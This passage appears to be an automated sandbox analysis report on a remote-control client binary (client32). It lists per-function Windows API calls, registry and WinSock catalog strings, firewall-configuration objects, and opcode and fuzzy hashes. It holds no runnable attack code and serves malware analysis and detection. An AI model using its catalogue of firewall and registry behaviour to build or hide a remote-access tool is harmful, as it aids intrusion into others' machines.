                                                                                • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              • _memset.LIBCMT ref: 11146055
                                                                              • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 4251163631-545709139
                                                                              • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                              • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                              • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                              • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                              Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1101567A
                                                                              • _memset.LIBCMT ref: 110156BE
                                                                              • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                              Strings
                                                                              • NSLSP, xrefs: 11015708
                                                                              • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                              • PackedCatalogItem, xrefs: 110156E2
                                                                              • %012d, xrefs: 11015674
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue_memsetwsprintf
                                                                              • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                              • API String ID: 1333399081-1346142259
                                                                              • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                              • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                              • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                              • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                              Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                              • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 2427920155-3145022300
                                                                              • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                              • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                              Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                              • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                              • API String ID: 3494822531-1878648853
                                                                              • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                              • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                              Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsJPIK.PCICHEK(AB86ACF8,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free_malloc_memsetwsprintf
                                                                              • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                              • API String ID: 2814900446-469156069
                                                                              • Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                              • Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                              Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101792C
                                                                              • CoInitialize.OLE32(00000000), ref: 11017935
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                              • CoUninitialize.OLE32 ref: 110179C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                              • API String ID: 2407233060-578995875
                                                                              • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                              • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                              Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017842
                                                                              • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                              • CoUninitialize.OLE32 ref: 110178D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                              • API String ID: 2407233060-2037925671
                                                                              • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                              • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                              Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • DoICFConfig() OK, xrefs: 111396D6
                                                                              • AutoICFConfig, xrefs: 11139650
                                                                              • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                              • Client, xrefs: 11139655
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                              • API String ID: 536389180-1512301160
                                                                              • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                              • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                              Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                              • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                              • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                              • String ID: HNetCfg.FwMgr$ICF Present:
                                                                              • API String ID: 3222248624-258972079
                                                                              • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                              • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                              Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                              • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                              • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                              • API String ID: 4186647306-532032230
                                                                              • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                              • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                              Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                              • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
